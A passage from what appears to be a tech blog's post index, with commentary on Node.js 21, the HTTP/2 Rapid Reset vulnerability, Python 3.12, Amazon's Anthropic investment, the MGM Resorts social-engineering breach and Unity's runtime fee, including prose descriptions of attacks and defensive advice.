honour goes to the even-numbered ones — Node.js 20 entered LTS this same week), they serve as the proving ground for features that will eventually land in the next LTS line.\nSo what does Node.js 21 bring to the table, and why should you care even if you\u0026rsquo;re firmly planted on an LTS release?\nBuilt-in WebSocket Client # The headline feature is the stable, built-in WebSocket client. Node.js has had experimental WebSocket support for a while, but 21 marks a significant step forward in making it a proper first-class citizen.\nFor years, the Node.js ecosystem has relied on packages like ws, socket.io, and others for WebSocket functionality. These libraries are excellent and aren\u0026rsquo;t going anywhere, but having a built-in WebSocket global that aligns with the browser API is a meaningful step toward runtime compatibility.\nconst ws = new WebSocket(\u0026#39;wss://example.com/socket\u0026#39;); ws.addEventListener(\u0026#39;open\u0026#39;, () =\u0026gt; { ws.send(\u0026#39;Hello from Node.js 21\u0026#39;); }); ws.addEventListener(\u0026#39;message\u0026#39;, (event) =\u0026gt; { console.log(\u0026#39;Received:\u0026#39;, event.data); }); If you write code that needs to run in both browser and server contexts, this is a genuine quality-of-life improvement. The same WebSocket code now works without conditional imports or polyfills. It\u0026rsquo;s part of a broader trend in Node.js toward implementing Web Platform APIs — fetch, WebCrypto, structuredClone, and now WebSocket.\nI\u0026rsquo;ve been advocating for this kind of convergence for years. The artificial barrier between \u0026ldquo;browser JavaScript\u0026rdquo; and \u0026ldquo;server JavaScript\u0026rdquo; has been a source of unnecessary complexity, and watching it gradually dissolve is satisfying.\nV8 11.8 and What It Brings # Node.js 21 ships with V8 11.8, which brings several improvements from the JavaScript engine side. The ArrayBuffer resizing and SharedArrayBuffer growth features are now available, which is particularly relevant for performance-sensitive applications that work with binary data.\nArray grouping with Object.groupBy() and Map.groupBy() is also now available. This has been a long time coming — it\u0026rsquo;s one of those utility functions that every project implements differently:\nconst inventory = [ { name: \u0026#39;asparagus\u0026#39;, type: \u0026#39;vegetable\u0026#39; }, { name: \u0026#39;banana\u0026#39;, type: \u0026#39;fruit\u0026#39; }, { name: \u0026#39;carrot\u0026#39;, type: \u0026#39;vegetable\u0026#39; }, ]; const grouped = Object.groupBy(inventory, (item) =\u0026gt; item.type); // { vegetable: [...], fruit: [...] } Lodash\u0026rsquo;s groupBy has been one of the most imported functions in the Node.js ecosystem for a decade. Having a native equivalent reduces bundle size and dependency count for a lot of projects.\nThe --experimental-default-type Flag # Node.js 21 stabilises the --experimental-default-type flag, allowing you to set the default module system for .js files to ESM. This continues the long, sometimes painful migration from CommonJS to ES modules.\nThe ESM transition in Node.js has been one of the more contentious journeys in the JavaScript ecosystem. It\u0026rsquo;s been years of dual-format packages, conditional exports, .mjs extensions, and \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json. Every release chips away at the friction, but we\u0026rsquo;re still not at the point where ESM \u0026ldquo;just works\u0026rdquo; in all scenarios.\nThis flag helps by letting you run an entire project as ESM without modifying package.json or renaming files. It\u0026rsquo;s particularly useful for quick scripts and prototyping where the ceremony of ESM configuration feels heavy.\nTest Runner Improvements # The built-in test runner (node:test) continues to mature. In Node.js 21, glob pattern support for specifying test files is now stable, and there are improvements to the assertion library.\nI\u0026rsquo;ve been watching the built-in test runner with interest since it was introduced. Jest and Vitest dominate the testing landscape, but having a zero-dependency test runner built into the runtime has clear advantages for certain use cases — particularly CI/CD pipelines where minimising install time matters, or for library authors who want to avoid testing framework dependencies.\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; describe(\u0026#39;Array\u0026#39;, () =\u0026gt; { it(\u0026#39;should return -1 when value is not present\u0026#39;, () =\u0026gt; { assert.strictEqual([1, 2, 3].indexOf(4), -1); }); }); The built-in runner isn\u0026rsquo;t going to replace Jest for complex applications with snapshot testing and mocking needs, but for straightforward test suites, it\u0026rsquo;s increasingly capable.\nThe LTS Transition Context # What makes this release cycle interesting is the timing. Node.js 20 simultaneously entered Active LTS status, which means it\u0026rsquo;s now the recommended version for production deployments. Node.js 21 is \u0026ldquo;Current\u0026rdquo; — it gets the latest features but only has a short support window.\nFor production systems, stick with Node.js 20 LTS. But if you\u0026rsquo;re starting new projects or maintaining libraries, testing against Node.js 21 now means fewer surprises when Node.js 22 arrives next year and eventually becomes LTS.\nMy advice for teams: set up your CI matrix to test against both the current LTS and the latest Current release. It\u0026rsquo;s minimal effort and catches compatibility issues months before they become urgent.\nMy Take # Node.js 21 isn\u0026rsquo;t a revolutionary release, but it\u0026rsquo;s a solid evolutionary one. The built-in WebSocket client, continued Web Platform API alignment, and V8 improvements all point in the right direction.\nWhat I find most encouraging is the project\u0026rsquo;s commitment to reducing the gap between server-side and client-side JavaScript. Every time Node.js implements another Web Platform API natively, it reduces the need for polyfills, simplifies isomorphic code, and makes the JavaScript ecosystem more coherent.\nThe runtime landscape is more competitive than ever — Deno and Bun are pushing the envelope in different ways — and that competition is clearly driving Node.js to iterate faster and adopt standards more aggressively. That\u0026rsquo;s healthy for everyone who writes JavaScript.\nIf you\u0026rsquo;re on Node.js 18 LTS, plan your upgrade to 20 LTS. If you\u0026rsquo;re already on 20, try 21 in your development environment and CI. And keep building — the JavaScript runtime ecosystem has never been more capable.\n","date":"19 October 2023","externalUrl":null,"permalink":"/posts/231019-nodejs-21-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 21 lands with a built-in WebSocket client, V8 11.8, and continued efforts to align the runtime with web platform standards.","title":"Node.js 21 Arrives — Built-in WebSocket Client and the Road to Stability","type":"posts"},{"content":"On October 10th, Google, Cloudflare, and Amazon Web Services jointly disclosed CVE-2023-44487, dubbed the \u0026ldquo;HTTP/2 Rapid Reset\u0026rdquo; attack. This isn\u0026rsquo;t your typical vulnerability announcement — it was actively exploited in the wild before disclosure, generating the largest DDoS attacks ever recorded. Google reported seeing attacks peaking at 398 million requests per second. Cloudflare recorded 201 million requests per second.\nLet those numbers sink in. Hundreds of millions of requests per second from relatively modest botnets. That\u0026rsquo;s the kind of amplification factor that changes the threat landscape.\nHow It Works # The vulnerability is elegant in its simplicity, which is what makes it so dangerous. It exploits a fundamental feature of the HTTP/2 protocol: stream multiplexing and the RST_STREAM frame.\nIn HTTP/2, a single TCP connection can carry multiple concurrent streams. A client opens a stream by sending a request, and can cancel that stream by sending a RST_STREAM frame. This is normal, expected behaviour — it\u0026rsquo;s how browsers cancel requests when you navigate away from a page, for example.\nThe attack works by rapidly opening new streams and immediately cancelling them with RST_STREAM. The key insight is that the server has to do work to process each stream — parsing headers, allocating resources, potentially hitting the application layer — but the client can cancel the stream before the server responds. The client never has to wait for or process responses, keeping its own resource usage minimal.\nBecause HTTP/2 servers typically allow hundreds of concurrent streams per connection, and because the RST_STREAM cancellation means the client never hits the concurrent stream limit (cancelled streams don\u0026rsquo;t count), an attacker can generate an enormous request rate with very little bandwidth.\nThis is fundamentally different from traditional HTTP flood attacks. With HTTP/1.1, each request-response cycle consumes resources on both sides. With this HTTP/2 exploitation, the asymmetry is heavily in the attacker\u0026rsquo;s favour, similar to how infrastructure dependencies create cascading failure scenarios.\nWhy This Is a Protocol-Level Problem # What makes CVE-2023-44487 particularly concerning is that it\u0026rsquo;s not a bug in any specific implementation — it\u0026rsquo;s a consequence of how the HTTP/2 protocol was designed. Every HTTP/2 server is potentially affected: nginx, Apache, IIS, Node.js, Go\u0026rsquo;s net/http, Envoy, HAProxy, and many more.\nEach implementation needs its own mitigation, and the fixes vary. Some servers now limit the rate of RST_STREAM frames. Others track the ratio of reset streams to completed streams and close connections that exceed a threshold. There\u0026rsquo;s no single patch that fixes everything.\nThis is reminiscent of other protocol-level issues we\u0026rsquo;ve seen over the years — slowloris attacks against HTTP/1.1, the TCP SYN flood, or more recently the various TLS renegotiation attacks. When the vulnerability is in the protocol design rather than the implementation, the fix is inherently messier.\nWhat You Need to Do # If you run any HTTP/2-facing infrastructure (and you almost certainly do), here\u0026rsquo;s the priority list:\n1. Patch your web servers and proxies. Nginx released patches, Cloudflare and AWS have mitigated on their platforms, and most major HTTP/2 implementations have issued updates. Check your specific stack.\n2. Review your load balancer and reverse proxy configurations. If you terminate HTTP/2 at a load balancer or CDN, make sure that layer is patched. If you\u0026rsquo;re behind Cloudflare, AWS CloudFront, or Google Cloud CDN, you\u0026rsquo;re likely already protected — but verify.\n3. Check your application servers. Even if you terminate HTTP/2 at a reverse proxy, some architectures pass HTTP/2 through to the application server. If your Node.js, Go, or Java application handles HTTP/2 directly, it needs to be updated.\n4. Monitor for unusual patterns. Look for connections with high stream reset rates. A legitimate client rarely opens and immediately cancels hundreds of streams. Implementing rate limiting on RST_STREAM frames at the connection level is a reasonable defensive measure.\n5. Consider your HTTP/2 settings. The SETTINGS_MAX_CONCURRENT_STREAMS parameter can limit exposure, though setting it too low affects legitimate performance. Finding the right balance depends on your traffic patterns.\nThe Bigger Picture # This vulnerability highlights a tension in protocol design that I\u0026rsquo;ve thought about for years. HTTP/2 was designed for performance — multiplexing, header compression, server push — and those features are genuinely valuable. But every new feature is a new attack surface, and the interaction between features (multiplexing + stream cancellation) can create unexpected vulnerabilities.\nWe\u0026rsquo;re seeing the same pattern with HTTP/3 and QUIC. More complexity means more potential for exploitation. I\u0026rsquo;m not saying we should stick with HTTP/1.1 forever — the performance benefits of modern protocols are real and important. But we need to be more rigorous about adversarial analysis during protocol design.\nThe coordinated disclosure between Google, Cloudflare, and AWS is a positive example of how the industry should handle these situations. These companies are competitors in almost every other dimension, but when it comes to protocol-level vulnerabilities, they recognised the need to work together. The attacks were being observed in August and September, and the coordinated response gave major infrastructure providers time to deploy mitigations before the public disclosure.\nMy Take # In my thirty years in this industry, I\u0026rsquo;ve seen plenty of \u0026ldquo;record-breaking\u0026rdquo; DDoS attacks. What makes this one different is the efficiency of the attack. You don\u0026rsquo;t need a massive botnet — the protocol amplification does the heavy lifting. That lowers the barrier for attackers significantly.\nIf you haven\u0026rsquo;t patched yet, do it today. Not tomorrow, not next sprint — today. The attack is already being used in the wild, the technique is now public knowledge, and exploitation tools will only proliferate.\nThe silver lining is that this is fixable at the implementation level, even if the underlying protocol design is the root cause. Rate limiting RST_STREAM frames is a reasonable mitigation that doesn\u0026rsquo;t significantly impact legitimate traffic. But it requires action from everyone running HTTP/2 infrastructure, which is essentially everyone running a web service in 2023.\nStay safe out there. Patch your servers, watch your traffic, and remember: the protocols we rely on are only as secure as their most creative adversarial analysis.\n","date":"12 October 2023","externalUrl":null,"permalink":"/posts/231012-http2-rapid-reset-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2023-44487 exploits a fundamental aspect of HTTP/2 to enable record-breaking DDoS attacks. Here’s what you need to know and do.","title":"HTTP/2 Rapid Reset — The Zero-Day That Hit Everyone","type":"posts"},{"content":"Python 3.12 was officially released on October 2nd, and after spending a few days putting it through its paces, I think this is one of the most practically impactful releases in recent memory. Not because of any single headline feature, but because the cumulative improvements address real pain points that Python developers deal with every day.\nThe release notes are extensive, but let me focus on what actually matters for working developers.\nPerformance: The Steady March Forward # The CPython team has continued the performance work that started with the Faster CPython project initiated by Mark Shannon and backed by Microsoft. Python 3.12 delivers another round of improvements, building on the gains from 3.11.\nThe comprehension inlining optimisation is a nice touch — list comprehensions no longer create a separate frame, which reduces overhead. It\u0026rsquo;s the kind of change that doesn\u0026rsquo;t sound dramatic but adds up across a codebase that leans heavily on Pythonic idioms.\nMore significantly, the work on the specialising adaptive interpreter continues. The interpreter now handles more bytecode patterns efficiently, and the startup time improvements are noticeable if you\u0026rsquo;re running lots of short-lived Python processes — think CLI tools, serverless functions, or test suites.\nI ran some informal benchmarks on a data processing pipeline I maintain, and saw roughly 5-8% improvement over 3.11 without changing any code. Your mileage will vary, but free performance is free performance.\nPer-Interpreter GIL: Laying the Groundwork # This is the feature that has the most long-term significance, even though most developers won\u0026rsquo;t use it directly yet. Python 3.12 introduces per-interpreter GIL as a build-time option through PEP 684.\nFor those unfamiliar with the pain: Python\u0026rsquo;s Global Interpreter Lock (GIL) has been the bane of CPU-bound multithreaded code for decades. The per-interpreter GIL means that separate sub-interpreters can now run truly in parallel, each with their own lock.\nThe caveat is that this is primarily a C-API feature right now. There\u0026rsquo;s no convenient Python-level API for sub-interpreters with separate GILs yet — that\u0026rsquo;s expected to come in future releases. But the foundation is being laid, and it\u0026rsquo;s being laid carefully, which I appreciate.\nHaving worked with Python\u0026rsquo;s threading limitations since the late 1990s, I can say that the approach the core team is taking — incremental, backward-compatible, carefully tested — is exactly right. The GIL can\u0026rsquo;t be ripped out overnight without breaking half the C extension ecosystem.\nBetter Error Messages Continue to Shine # Python 3.11 made a huge leap in error message quality, and 3.12 continues the trend. The improvements to NameError suggestions are particularly welcome — if you mistype a variable name, Python now suggests corrections from a broader context, including module-level names and builtins.\nThe improved SyntaxError messages for common mistakes are also excellent. I\u0026rsquo;ve watched junior developers on my teams spend twenty minutes debugging what turns out to be a missing colon or an incorrect indentation. Every improvement in error messaging directly translates to developer productivity.\nThis might seem like a small thing compared to performance numbers, but I\u0026rsquo;d argue it\u0026rsquo;s one of the most impactful changes for the community. Python\u0026rsquo;s role as a teaching language and as a first language for many developers makes error message quality a genuine strategic feature.\nType Parameter Syntax (PEP 695) # The new type parameter syntax is a significant quality-of-life improvement for anyone using Python\u0026rsquo;s type system. Instead of the somewhat awkward TypeVar approach:\nfrom typing import TypeVar T = TypeVar(\u0026#39;T\u0026#39;) def first(items: list[T]) -\u0026gt; T: return items[0] You can now write:\ndef first[T](items: list[T]) -\u0026gt; T: return items[0] This brings Python\u0026rsquo;s generic syntax closer to what developers expect if they\u0026rsquo;ve used generics in TypeScript, Java, or C#. The type statement for type aliases is similarly clean:\ntype Vector = list[float] type Matrix[T] = list[list[T]] I\u0026rsquo;ve been a gradual convert to Python\u0026rsquo;s type system over the past few years. It\u0026rsquo;s not perfect, and runtime enforcement is still largely absent without third-party tools, but for documentation, IDE support, and catching bugs early with mypy or pyright, it\u0026rsquo;s become indispensable on larger codebases. PEP 695 removes one of the last rough edges.\nRemoved Deprecated Modules # Python 3.12 removes a batch of long-deprecated modules including distutils, asynchat, asyncore, and several others. The distutils removal is the one most likely to bite people — if you have old setup.py files that import from distutils, it\u0026rsquo;s time to migrate to setuptools or another modern build backend.\nThis is healthy housekeeping. Python\u0026rsquo;s standard library has accumulated cruft over the decades, and clearing it out reduces maintenance burden and confusion for newcomers.\nMy Take # Python 3.12 is a solid release that continues the trajectory the core team has been on: faster runtime, better developer experience, and a more capable type system. There\u0026rsquo;s no single \u0026ldquo;must upgrade immediately\u0026rdquo; feature, but the cumulative effect is compelling.\nMy recommendation: start testing your projects against 3.12 now. If you\u0026rsquo;re still on 3.9 or 3.10, consider skipping straight to 3.12 — the performance improvements alone justify the effort, and the error message improvements will make your whole team more productive.\nThe per-interpreter GIL work is the one to watch for future releases. If the Python team can deliver a usable API for true parallelism in 3.13 or 3.14, it could fundamentally change how we think about Python for CPU-bound workloads. For now, it\u0026rsquo;s a promising foundation.\nPython continues to be the language that meets you where you are. And with 3.12, it meets you a little faster and with better error messages when you take a wrong turn.\n","date":"5 October 2023","externalUrl":null,"permalink":"/posts/231005-python-312-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12 arrives with significant performance improvements, better error messages, and a new type system feature that changes how we write Python.","title":"Python 3.12 Is Here — Performance, Developer Experience, and What Matters","type":"posts"},{"content":"This week Amazon announced it\u0026rsquo;s investing up to $4 billion in Anthropic, the AI safety startup behind the Claude family of large language models. It\u0026rsquo;s the largest outside investment Amazon has ever made, and it firmly establishes a pattern we\u0026rsquo;ve been watching unfold all year: the major cloud providers are going all-in on AI partnerships rather than purely building in-house.\nIf you\u0026rsquo;ve been keeping score, Microsoft has OpenAI, Google has a separate deal with Anthropic (and its own DeepMind), and now Amazon has cemented its relationship with Anthropic as well. The chess pieces on the AI board are being placed with remarkable speed.\nThe Cloud Infrastructure Play # What makes this investment particularly interesting from an infrastructure perspective is the commitment that Anthropic will use Amazon Web Services as its primary cloud provider. This isn\u0026rsquo;t just a financial investment — it\u0026rsquo;s a strategic lock-in that ensures some of the most demanding AI workloads in the world will run on AWS.\nTraining large language models requires enormous compute resources. We\u0026rsquo;re talking thousands of GPUs running for weeks or months. When Anthropic runs those workloads on AWS, it pushes Amazon to improve its AI-specific infrastructure — custom chips like Trainium and Inferentia, networking optimisation, storage throughput — in ways that benefit every AWS customer.\nI\u0026rsquo;ve spent enough years working with cloud infrastructure to recognise this pattern. When a cloud provider has a marquee customer pushing the boundaries of what\u0026rsquo;s possible, the improvements trickle down to everyone. Amazon\u0026rsquo;s investment in Anthropic is as much about making AWS the best platform for AI workloads as it is about owning a piece of the AI future.\nThe Model-as-a-Service Ecosystem # Amazon Bedrock, their managed service for foundation models, gets a significant boost from this deal. Anthropic\u0026rsquo;s Claude models are already available through Bedrock, and this deeper partnership likely means tighter integration, better performance, and possibly early access to new model capabilities. This mirrors the model-as-a-service strategy OpenAI pioneered with Azure.\nFor developers building applications on top of LLMs, this is actually good news. The more competition there is among cloud providers to offer the best AI model access, the better the developer experience becomes. We\u0026rsquo;re seeing APIs become more standardised, pricing become more competitive, and tooling become more mature.\nWhat concerns me slightly is the consolidation aspect. When the three major cloud providers each have their preferred AI partner, it creates a kind of oligopoly in the foundation model space. If you\u0026rsquo;re building on AWS, you\u0026rsquo;ll naturally gravitate toward Claude through Bedrock. On Azure, it\u0026rsquo;s OpenAI. On Google Cloud, it\u0026rsquo;s Gemini. The switching costs aren\u0026rsquo;t just about the cloud infrastructure anymore — they\u0026rsquo;re about the model ecosystem.\nWhat About the Smaller Players? # The question I keep coming back to is: where does this leave the open-source AI community and smaller AI companies? Mistral, Cohere, AI21 Labs, and others are building impressive models, but they don\u0026rsquo;t have $4 billion backing from a hyperscaler.\nThere\u0026rsquo;s a real risk that the AI landscape bifurcates into the \u0026ldquo;cloud-backed giants\u0026rdquo; and everyone else. Open-source models like Llama 2 provide an alternative, but the compute required to train competitive models is becoming a genuine barrier to entry. You need either deep pockets or a cloud provider willing to foot the bill.\nThat said, the open-source community has a way of surprising everyone. The pace of innovation in techniques like quantisation, efficient fine-tuning with LoRA and QLoRA, and novel architectures means that smaller teams can sometimes punch well above their weight.\nThe Safety Angle # Anthropic positions itself as an AI safety company first, and their Constitutional AI approach is genuinely interesting from a technical perspective. Amazon\u0026rsquo;s investment presumably comes with some expectation that safety research continues to be a priority, which is a net positive for the industry.\nHaving a major cloud provider financially incentivised to support AI safety research creates an interesting dynamic. It suggests that \u0026ldquo;responsible AI\u0026rdquo; isn\u0026rsquo;t just a marketing buzzword anymore — it\u0026rsquo;s becoming a competitive differentiator that attracts serious capital.\nMy Take # I\u0026rsquo;ve watched enough technology cycles to know that the biggest investments don\u0026rsquo;t always pick the winners. But what Amazon\u0026rsquo;s Anthropic bet tells us is that the cloud providers see AI as the most important battleground of the next decade. This isn\u0026rsquo;t exploratory investment — it\u0026rsquo;s strategic positioning at massive scale.\nFor those of us building software, the practical implication is clear: AI capabilities are becoming a core feature of cloud platforms, not an add-on. If you\u0026rsquo;re not already thinking about how LLMs and foundation models fit into your architecture, now is the time to start experimenting.\nThe $4 billion question is whether this consolidation ultimately helps or hurts developers. My instinct says it\u0026rsquo;ll help in the short term — better tools, better APIs, lower prices — but we should keep a close eye on vendor lock-in as these ecosystems mature.\nThe AI race is no longer just about who has the best model. It\u0026rsquo;s about who has the best platform. And that\u0026rsquo;s a game the cloud providers know how to play.\n","date":"28 September 2023","externalUrl":null,"permalink":"/posts/230928-amazon-anthropic-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon pours $4 billion into Anthropic, signalling a major shift in how cloud providers are positioning themselves in the AI race.","title":"Amazon's $4 Billion Anthropic Bet — What It Means for Cloud AI","type":"posts"},{"content":"It\u0026rsquo;s been about ten days since MGM Resorts International confirmed a major cybersecurity incident that has disrupted operations across their properties. Slot machines went dark, hotel room keys stopped working, guests couldn\u0026rsquo;t check in electronically, and the company\u0026rsquo;s website was taken down. The estimated financial impact is staggering — analysts are projecting costs could exceed $100 million. And from what we know so far, it started with a phone call.\nThe attack has been attributed to a group known as Scattered Spider (also tracked as UNC3944), reportedly working with the ALPHV/BlackCat ransomware operation. According to multiple reports, the initial breach vector was a social engineering call to MGM\u0026rsquo;s IT help desk. An attacker, armed with information scraped from a LinkedIn profile, convinced a help desk employee to reset credentials. From that foothold, the attackers escalated privileges and eventually deployed ransomware across MGM\u0026rsquo;s systems.\nThe Social Engineering Problem We Keep Ignoring # Let me be direct: we spend billions on firewalls, endpoint detection, zero-trust architectures, and AI-powered threat detection, and then a 10-minute phone call brings down a $14 billion company. This isn\u0026rsquo;t a technology failure. It\u0026rsquo;s a systemic failure in how we think about security.\nSocial engineering isn\u0026rsquo;t new, and it isn\u0026rsquo;t exotic. Kevin Mitnick wrote about it decades ago. Yet here we are in 2023, and the help desk remains one of the softest entry points in most organizations. The reason is straightforward: help desks are optimized for customer service. Their KPIs are resolution time and customer satisfaction. Security friction is the enemy of those metrics.\nWhen an articulate caller provides enough personally identifiable information to seem legitimate and pressures for immediate access, the path of least resistance is to help them. That\u0026rsquo;s what help desk staff are trained to do — help. The attacker exploits not a bug in software, but a feature in human psychology.\nWhat\u0026rsquo;s particularly notable about the Scattered Spider group is their fluent English and social manipulation skills. Unlike many ransomware operations that rely primarily on technical exploitation, this group excels at the human element. They research targets thoroughly, craft convincing pretexts, and execute with the confidence of someone who belongs.\nThe Cloud and Identity Layer # Reports suggest that the attackers targeted MGM\u0026rsquo;s Okta environment and their Azure Active Directory, essentially going after the identity layer that ties everything together. This is the nightmare scenario for organizations that have centralized their identity management (which is the right thing to do, ironically).\nWhen your identity provider is compromised, the attacker doesn\u0026rsquo;t need individual exploits for each system. They have the keys to the kingdom. Every application that trusts your IdP, every service that uses SSO, every cloud resource protected by that identity layer — all of it becomes accessible.\nThis highlights a critical challenge in modern cloud architecture: centralized identity is both the best practice for security and a catastrophic single point of failure if breached. The answer isn\u0026rsquo;t to go back to fragmented authentication — it\u0026rsquo;s to layer additional protections around the identity infrastructure itself.\nMulti-factor authentication helps, but it\u0026rsquo;s not a complete solution. The Scattered Spider group has demonstrated the ability to bypass MFA through social engineering (convincing help desks to add new MFA devices) and MFA fatigue attacks (repeatedly triggering push notifications until a tired user approves one). Hardware security keys like YubiKeys are more resistant, but adoption rates remain low even in security-conscious organizations.\nThe Caesars Connection # It\u0026rsquo;s worth noting that Caesars Entertainment disclosed their own breach just days before the MGM incident became public. Caesars reportedly paid approximately $15 million in ransom — roughly half of the $30 million demanded. The same group is believed to be responsible.\nThe contrast in responses is instructive. Caesars paid the ransom, contained the damage relatively quietly, and resumed normal operations. MGM refused to pay, resulting in extended outages across their properties. There\u0026rsquo;s no universally right answer here — the FBI advises against paying ransoms, but when your entire operation is crippled and every day costs millions, the calculation gets complicated fast.\nFrom a technical standpoint, MGM\u0026rsquo;s extended recovery time suggests either insufficient backup and recovery infrastructure or that the attackers achieved deep enough access to compromise recovery mechanisms themselves. Sophisticated ransomware operations now specifically target backup systems, knowing that intact backups are the primary alternative to paying.\nWhat Organizations Should Actually Do # If you\u0026rsquo;re an engineering or security leader reading this, here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nHarden your help desk procedures. Implement callback verification for sensitive operations. Require manager approval for credential resets on privileged accounts. Train help desk staff to recognize social engineering tactics and give them explicit permission to refuse requests that don\u0026rsquo;t pass verification, without fear of negative performance reviews.\nProtect the identity layer. Treat your IdP as critical infrastructure. Implement hardware MFA for administrative access. Monitor for anomalous authentication patterns. Have a specific incident response plan for identity infrastructure compromise.\nAssume breach in your architecture. Implement network segmentation so that compromising one system doesn\u0026rsquo;t grant access to everything. Use just-in-time access provisioning rather than standing privileges. Monitor lateral movement indicators.\nTest your recovery. Regular disaster recovery testing isn\u0026rsquo;t just about checking a compliance box. Can you actually restore operations if your primary systems and backups are simultaneously compromised? How long does it take? What\u0026rsquo;s the manual fallback?\nMy Take # I\u0026rsquo;ve been in this industry long enough to see the same fundamental patterns repeat across decades of increasingly sophisticated technology. The MGM breach is, at its core, the same class of attack that has worked since the dawn of computing: fool a human, get access, escalate, profit.\nWhat frustrates me is that social engineering remains the neglected stepchild of security investment. Organizations spend millions on SIEM platforms and endpoint detection but treat security awareness training as an annual checkbox exercise. The attacker community has clearly figured out that the human layer is the most cost-effective attack surface. Our defensive investments should reflect that reality.\nThe MGM incident will generate months of analysis, regulatory scrutiny, and vendor marketing campaigns for various security products. But if it doesn\u0026rsquo;t fundamentally change how organizations think about help desk security and identity protection, then we\u0026rsquo;ll be writing about the next version of this story within the year.\nDon\u0026rsquo;t wait for the case study. Audit your help desk procedures this week. Test your identity infrastructure resilience this month. The attackers are already researching their next target.\n","date":"21 September 2023","externalUrl":null,"permalink":"/posts/230921-mgm-resorts-social-engineering-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The MGM Resorts cyberattack that started with a phone call is a stark reminder that the most sophisticated defenses can be undone by human vulnerability.","title":"The MGM Resorts Hack — A $100M Lesson in Social Engineering","type":"posts"},{"content":"On Tuesday, Unity Technologies announced a new \u0026ldquo;Unity Runtime Fee\u0026rdquo; — a charge that kicks in when games built with Unity exceed certain install thresholds. Starting January 1, 2024, developers using Unity Personal and Unity Pro would owe Unity between $0.01 and $0.20 per install after crossing revenue and install count thresholds. The backlash has been immediate, severe, and entirely predictable. As someone who has watched platform dynamics play out across many domains over three decades, this is a masterclass in how to destroy developer trust.\nThe Policy and Why It\u0026rsquo;s Problematic # The details matter here, and they\u0026rsquo;re worse than the headline suggests. Unity plans to track installs using their own proprietary data model — not sales, not revenue, but installs. That means reinstalls count. Installing on a new device counts. If your game goes free-to-play and gets millions of installs but monetizes poorly, you could owe Unity more than you earn.\nThe thresholds vary by tier: Unity Personal users would start paying after $200K in trailing twelve-month revenue and 200K lifetime installs. Unity Pro and Enterprise have higher thresholds but the per-install fees still apply. For successful indie games, the math gets alarming quickly. A game with 10 million installs could owe Unity hundreds of thousands of dollars — retroactively, for games already built and shipped under the previous licensing terms.\nThat retroactive application is perhaps the most egregious aspect. Developers made business decisions — chose an engine, built their game, signed publishing deals — based on Unity\u0026rsquo;s existing pricing model. Changing the terms after the fact, for software already in the market, violates a fundamental principle of platform trust.\nThe Broader Platform Lesson # This isn\u0026rsquo;t just a game development story. It\u0026rsquo;s a cautionary tale for every developer who builds on a proprietary platform. The pattern is familiar: a platform grows by being developer-friendly, achieves market dominance, then changes the terms to extract more value from its captive user base.\nWe\u0026rsquo;ve seen variants of this across the tech industry. Oracle\u0026rsquo;s aggressive licensing changes after acquiring Sun. Docker\u0026rsquo;s pricing adjustments that caught many organizations off guard. Twitter\u0026rsquo;s API pricing that killed an ecosystem of third-party apps. The common thread is that platforms eventually optimize for revenue extraction over ecosystem health.\nWhat makes Unity\u0026rsquo;s move particularly striking is the timing and severity. The company has been struggling financially — their stock is down significantly from its highs, they\u0026rsquo;ve had layoffs, and the merger with ironSource has been controversial. This fee structure looks like a desperate attempt to find new revenue, implemented by people who don\u0026rsquo;t understand (or don\u0026rsquo;t care about) the downstream effects on their developer community.\nWhat Developers Are Doing # The response from the Unity developer community has been extraordinary. Multiple game studios have publicly stated they\u0026rsquo;re evaluating alternatives. Cult of the Lamb\u0026rsquo;s developer Massive Monster, Innersloth (Among Us), and Aggro Crab (Going Under) have all spoken out. Some developers are threatening to pull their games from storefronts rather than pay the fee. Others are already beginning the painful process of evaluating engine switches.\nGodot Engine, the open-source game engine, has seen an enormous surge in interest. Their Twitter account gained tens of thousands of followers in days. Unreal Engine, Epic\u0026rsquo;s proprietary but more predictably priced alternative, is also getting renewed attention.\nBut switching engines isn\u0026rsquo;t like switching text editors. Game engines are deeply embedded in a development team\u0026rsquo;s workflow, tools, expertise, and existing codebases. A mid-project engine switch is essentially starting over. Even for new projects, the switching cost includes retraining your team, rebuilding your tool pipeline, and accepting a productivity dip that could last months or years.\nThis is exactly the kind of lock-in that makes platform changes so insidious. The cost of leaving is so high that many developers will stay and absorb the fee, even if they resent it. Unity is counting on that calculus.\nThe Open Source Alternative # The surge of interest in Godot Engine deserves special attention. Godot has been steadily improving for years, and its 4.0 release earlier this year brought significant graphics and performance improvements. It\u0026rsquo;s MIT-licensed, meaning it\u0026rsquo;s free to use, free to modify, and free from the kind of licensing ambush Unity just pulled.\nCould Godot replace Unity for all use cases today? Honestly, no. Unity\u0026rsquo;s ecosystem of assets, its mobile deployment pipeline, and its tooling maturity still have advantages for many projects. But the gap has been narrowing, and Unity just gave Godot the biggest marketing boost it could have asked for.\nI\u0026rsquo;ve always been an advocate for open-source infrastructure in development workflows. Not because proprietary tools are inherently bad — they often provide excellent experiences — but because open-source tools can\u0026rsquo;t pull the rug out from under you. When your business depends on a tool, the license under which you use that tool is a strategic concern, not just a legal technicality.\nMy Take # I think Unity will walk this back. The backlash is too severe, the developer exodus too visible, and the PR damage too deep for them to push through the current proposal unchanged. We\u0026rsquo;ll likely see revised thresholds, exemptions for existing games, and softer language within weeks.\nBut even a full reversal won\u0026rsquo;t fully repair the trust. The message has been sent: Unity\u0026rsquo;s leadership is willing to retroactively change terms to extract revenue from their developer base. Even if this particular policy is softened, developers will — and should — factor that willingness into their platform decisions going forward.\nThe lesson for all of us, whether we build games or web apps or cloud services, is clear: be thoughtful about your dependencies. Evaluate not just the technical capabilities of your platforms, but the business incentives of the companies behind them. And when viable open-source alternatives exist, give them serious consideration. The price you\u0026rsquo;re not paying today might be the leverage you\u0026rsquo;ll wish you had tomorrow.\nI don\u0026rsquo;t build games, but I recognize the dynamic. Every time I choose a framework, a cloud provider, or a development tool, I\u0026rsquo;m making a bet on the future behavior of the organization behind it. Unity just reminded all of us why that bet matters.\n","date":"14 September 